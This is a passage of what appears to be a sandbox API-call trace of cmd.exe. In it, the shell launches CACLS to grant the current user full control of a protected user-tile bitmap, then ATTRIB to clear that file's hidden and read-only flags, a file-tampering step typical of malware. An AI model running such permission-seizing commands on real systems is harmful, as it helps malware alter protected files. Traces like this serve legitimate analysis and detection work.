lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x0, lpData=0x2eeac0*=0x1, lpcbData=0x2eeab8*=0x1000) returned 0x2 [0190.025] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x4, lpData=0x2eeac0*=0x0, lpcbData=0x2eeab8*=0x4) returned 0x0 [0190.025] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x4, lpData=0x2eeac0*=0x9, lpcbData=0x2eeab8*=0x4) returned 0x0 [0190.025] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x4, lpData=0x2eeac0*=0x9, lpcbData=0x2eeab8*=0x4) returned 0x0 [0190.025] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeabc, lpData=0x2eeac0, lpcbData=0x2eeab8*=0x1000 | out: lpType=0x2eeabc*=0x0, lpData=0x2eeac0*=0x9, lpcbData=0x2eeab8*=0x1000) returned 0x2 [0190.025] RegCloseKey (hKey=0x40) returned 0x0 [0190.025] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886398 [0190.025] srand (_Seed=0x5b886398) [0190.025] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"" [0190.025] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"" [0190.025] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.025] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x471a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0190.025] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0190.025] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0190.025] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0190.025] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0190.025] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0190.025] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0190.025] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0190.025] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0190.026] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0190.026] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0190.026] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0190.026] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0190.026] GetEnvironmentStringsW () returned 0x472458* [0190.026] FreeEnvironmentStringsW (penv=0x472458) returned 1 [0190.026] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.026] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0190.026] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0190.026] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0190.026] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0190.026] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0190.026] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0190.026] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0190.026] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0190.026] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0190.026] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef880 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.026] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef880, lpFilePart=0x2ef87c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef87c*="Desktop") returned 0x18 [0190.026] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0190.026] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef5fc | out: lpFindFileData=0x2ef5fc) returned 0x470ae8 [0190.026] FindClose (in: hFindFile=0x470ae8 | out: hFindFile=0x470ae8) returned 1 [0190.027] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef5fc | out: lpFindFileData=0x2ef5fc) returned 0x470ae8 [0190.027] FindClose (in: hFindFile=0x470ae8 | out: hFindFile=0x470ae8) returned 1 [0190.027] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef5fc | out: lpFindFileData=0x2ef5fc) returned 0x470ae8 [0190.027] FindClose (in: hFindFile=0x470ae8 | out: hFindFile=0x470ae8) returned 1 [0190.027] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0190.027] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0190.027] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0190.027] GetEnvironmentStringsW () returned 0x470308* [0190.027] FreeEnvironmentStringsW (penv=0x470308) returned 1 [0190.027] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.028] GetConsoleOutputCP () returned 0x1b5 [0190.028] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0190.028] GetUserDefaultLCID () returned 0x409 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef9c0, cchData=128 | out: lpLCData="0") returned 2 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef9c0, cchData=128 | out: lpLCData="0") returned 2 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef9c0, cchData=128 | out: lpLCData="1") returned 2 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0190.028] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0190.028] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0190.029] GetConsoleTitleW (in: lpConsoleTitle=0x4609b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.029] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0190.029] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0190.029] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0190.030] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0190.030] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0190.031] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0190.031] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0190.031] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0190.031] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0190.031] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0190.031] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0190.031] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0190.034] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0190.034] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0190.034] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0190.034] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0190.034] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0190.034] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0190.034] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0190.036] GetConsoleTitleW (in: lpConsoleTitle=0x2ef654, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.036] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0190.036] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0190.036] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0190.036] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0190.036] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0190.036] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0190.036] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0190.036] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0190.036] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0190.036] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0190.036] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0190.036] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0190.036] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0190.036] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0190.036] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0190.036] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0190.036] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0190.036] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0190.036] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0190.036] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0190.036] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0190.036] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0190.037] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0190.037] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0190.037] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0190.037] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0190.037] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0190.037] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0190.037] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0190.037] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0190.037] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0190.037] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0190.037] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0190.037] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0190.037] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0190.037] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0190.037] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0190.037] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0190.037] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0190.037] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0190.037] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0190.037] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0190.037] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0190.037] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0190.037] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0190.037] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0190.037] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0190.037] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0190.037] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0190.037] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0190.037] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0190.037] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0190.037] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0190.037] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0190.037] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0190.037] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0190.037] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0190.038] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0190.038] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0190.038] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0190.038] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0190.038] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0190.038] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0190.038] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0190.038] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0190.038] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0190.038] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0190.038] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0190.038] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0190.038] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0190.038] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0190.038] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0190.038] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0190.038] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0190.038] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0190.038] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0190.038] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0190.038] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0190.038] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0190.038] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0190.038] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0190.038] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0190.038] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0190.038] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0190.038] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0190.038] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0190.038] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0190.038] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0190.039] SetErrorMode (uMode=0x0) returned 0x0 [0190.039] SetErrorMode (uMode=0x1) returned 0x0 [0190.039] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x471e98, lpFilePart=0x2ef174 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef174*="Desktop") returned 0x18 [0190.039] SetErrorMode (uMode=0x0) returned 0x1 [0190.039] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0190.039] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0190.044] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0190.045] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0xffffffff [0190.045] GetLastError () returned 0x2 [0190.045] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0xffffffff [0190.045] GetLastError () returned 0x2 [0190.046] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0x472180 [0190.046] FindClose (in: hFindFile=0x472180 | out: hFindFile=0x472180) returned 1 [0190.046] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0xffffffff [0190.046] GetLastError () returned 0x2 [0190.046] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0x472180 [0190.046] FindClose (in: hFindFile=0x472180 | out: hFindFile=0x472180) returned 1 [0190.046] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0190.046] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0190.046] GetConsoleTitleW (in: lpConsoleTitle=0x2ef3e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.046] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef270, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef338 | out: lpAttributeList=0x2ef270, lpSize=0x2ef338) returned 1 [0190.046] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef270, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef330, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef270, lpPreviousValue=0x0) returned 1 [0190.046] GetStartupInfoW (in: lpStartupInfo=0x2ef22c | out: lpStartupInfo=0x2ef22c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0190.046] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0190.047] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef2cc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef318 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2ef318*(hProcess=0x50, hThread=0x4c, dwProcessId=0x248, dwThreadId=0x9cc)) returned 1 [0190.050] CloseHandle (hObject=0x4c) returned 1 [0190.050] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0190.050] GetEnvironmentStringsW () returned 0x470308* [0190.050] FreeEnvironmentStringsW (penv=0x470308) returned 1 [0190.050] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0190.080] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ef20c | out: lpExitCode=0x2ef20c*=0x0) returned 1 [0190.080] CloseHandle (hObject=0x50) returned 1 [0190.080] _vsnwprintf (in: _Buffer=0x2ef354, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef218 | out: _Buffer="00000000") returned 8 [0190.080] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0190.080] GetEnvironmentStringsW () returned 0x472410* [0190.080] FreeEnvironmentStringsW (penv=0x472410) returned 1 [0190.080] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0190.080] GetEnvironmentStringsW () returned 0x472410* [0190.080] FreeEnvironmentStringsW (penv=0x472410) returned 1 [0190.080] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef270 | out: lpAttributeList=0x2ef270) [0190.080] GetConsoleTitleW (in: lpConsoleTitle=0x2ef654, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.081] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0190.081] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0190.081] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0190.081] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0xffffffff [0190.081] GetLastError () returned 0x2 [0190.081] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0xffffffff [0190.081] GetLastError () returned 0x2 [0190.081] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0x46e4d8 [0190.081] FindClose (in: hFindFile=0x46e4d8 | out: hFindFile=0x46e4d8) returned 1 [0190.081] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0xffffffff [0190.082] GetLastError () returned 0x2 [0190.082] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eeef0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeef0) returned 0x46e4d8 [0190.082] FindClose (in: hFindFile=0x46e4d8 | out: hFindFile=0x46e4d8) returned 1 [0190.082] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0190.082] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0190.082] GetConsoleTitleW (in: lpConsoleTitle=0x2ef3e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.082] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef270, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef338 | out: lpAttributeList=0x2ef270, lpSize=0x2ef338) returned 1 [0190.082] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef270, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef330, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef270, lpPreviousValue=0x0) returned 1 [0190.082] GetStartupInfoW (in: lpStartupInfo=0x2ef22c | out: lpStartupInfo=0x2ef22c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0190.082] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0190.082] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2ef2cc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef318 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp\"", 